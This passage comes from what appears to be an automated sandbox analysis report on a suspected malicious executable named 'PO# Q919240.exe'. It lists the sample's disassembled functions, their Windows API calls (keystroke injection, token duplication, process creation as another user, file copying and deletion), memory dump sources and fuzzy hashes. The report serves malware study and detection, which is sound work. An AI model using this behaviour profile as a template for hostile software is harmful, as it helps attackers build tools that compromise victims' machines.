                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                Function 0045E17D Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __lock_file
                • String ID:
                • API String ID: 3031932315-0
                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                Function 00443E36 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                Download Yara Rule
                APIs
                • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FileWrite
                • String ID:
                • API String ID: 3934441357-0
                • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                Function 004149C2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                Function 04264300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                Download Yara Rule
                APIs
                • Sleep.KERNELBASE(000001F4), ref: 04264311
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction ID: 0eddcd7d85aaba94a14a4869978b6bae85fe7103c32ce23040a51030abd5283e
                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction Fuzzy Hash: 3CE0E67494010DDFDB00EFF8D54969E7FB4EF04302F100561FD01D2280D6309D608A62

                Non-executed Functions

                Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                Download Yara Rule
                APIs
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                • GetKeyState.USER32(00000011), ref: 0047C92D
                • GetKeyState.USER32(00000009), ref: 0047C936
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                • GetKeyState.USER32(00000010), ref: 0047C953
                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                • _wcsncpy.LIBCMT ref: 0047CA29
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                • SendMessageW.USER32 ref: 0047CA7F
                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                • ImageList_SetDragCursorImage.COMCTL32(00A623D8,00000000,00000000,00000000), ref: 0047CB9B
                • ImageList_BeginDrag.COMCTL32(00A623D8,00000000,000000F8,000000F0), ref: 0047CBAC
                • SetCapture.USER32(?), ref: 0047CBB6
                • ClientToScreen.USER32(?,?), ref: 0047CC17
                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                • ReleaseCapture.USER32 ref: 0047CC3A
                • GetCursorPos.USER32(?), ref: 0047CC72
                • ScreenToClient.USER32(?,?), ref: 0047CC80
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                • SendMessageW.USER32 ref: 0047CD12
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                • SendMessageW.USER32 ref: 0047CD80
                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                • GetCursorPos.USER32(?), ref: 0047CDC8
                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                • GetParent.USER32(00000000), ref: 0047CDF7
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                • SendMessageW.USER32 ref: 0047CE93
                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                • TrackPopupMenuEx.USER32(?,00000000,?,?,00941BC0,00000000,?,?,?,?), ref: 0047CF1C
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                • SendMessageW.USER32 ref: 0047CF6B
                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                • TrackPopupMenuEx.USER32(?,00000080,?,?,00941BC0,00000000,?,?,?,?), ref: 0047CFE6
                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                • String ID: @GUI_DRAGID$F
                • API String ID: 3100379633-4164748364
                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                Download Yara Rule
                APIs
                • GetForegroundWindow.USER32 ref: 00434420
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                • IsIconic.USER32(?), ref: 0043444F
                • ShowWindow.USER32(?,00000009), ref: 0043445C
                • SetForegroundWindow.USER32(?), ref: 0043446A
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                • GetCurrentThreadId.KERNEL32 ref: 00434485
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                • keybd_event.USER32(00000012,00000000), ref: 00434514
                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                • String ID: Shell_TrayWnd
                • API String ID: 2889586943-2988720461
                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                Download Yara Rule
                APIs
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                • CloseHandle.KERNEL32(?), ref: 004463A0
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                • GetProcessWindowStation.USER32 ref: 004463D1
                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                • _wcslen.LIBCMT ref: 00446498
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _wcsncpy.LIBCMT ref: 004464C0
                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                • CloseWindowStation.USER32(00000000), ref: 0044656C
                • CloseDesktop.USER32(?), ref: 0044657A
                • SetProcessWindowStation.USER32(?), ref: 00446588
                • CloseHandle.KERNEL32(?), ref: 00446592
                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                • String ID: $@OH$default$winsta0
                • API String ID: 3324942560-3791954436
                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 004096C1
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _memmove.LIBCMT ref: 0040970C
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                • _memmove.LIBCMT ref: 00409D96
                • _memmove.LIBCMT ref: 0040A6C4
                • _memmove.LIBCMT ref: 004297E5
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                • String ID:
                • API String ID: 2383988440-0
                • Opcode ID: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                • Opcode Fuzzy Hash: e127891bc0a98d019add158fe61e22172890978285290b421ac62a594046158c
                • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\PO# Q919240.exe,0040F545,C:\Users\user\Desktop\PO# Q919240.exe,004A90E8,C:\Users\user\Desktop\PO# Q919240.exe,?,0040F545), ref: 0041013C
                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                  • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                  • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                • _wcscat.LIBCMT ref: 0044BD94
                • _wcscat.LIBCMT ref: 0044BDBD
                • __wsplitpath.LIBCMT ref: 0044BDEA
                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                • _wcscpy.LIBCMT ref: 0044BE71
                • _wcscat.LIBCMT ref: 0044BE83
                • _wcscat.LIBCMT ref: 0044BE95
                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                • DeleteFileW.KERNEL32(?), ref: 0044BED3
                • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                • DeleteFileW.KERNEL32(?), ref: 0044BF15
                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                • FindClose.KERNEL32(00000000), ref: 0044BF33
                • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                • FindClose.KERNEL32(00000000), ref: 0044BF7C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                • String ID: \*.*
                • API String ID: 2188072990-1173974218
                • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                Download Yara Rule
                APIs
                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                • FindClose.KERNEL32(00000000), ref: 00478924
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                • __swprintf.LIBCMT ref: 004789D3
                • __swprintf.LIBCMT ref: 00478A1D
                • __swprintf.LIBCMT ref: 00478A4B
                • __swprintf.LIBCMT ref: 00478A79
                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                • __swprintf.LIBCMT ref: 00478AA7
                • __swprintf.LIBCMT ref: 00478AD5
                • __swprintf.LIBCMT ref: 00478B03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                • API String ID: 999945258-2428617273
                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
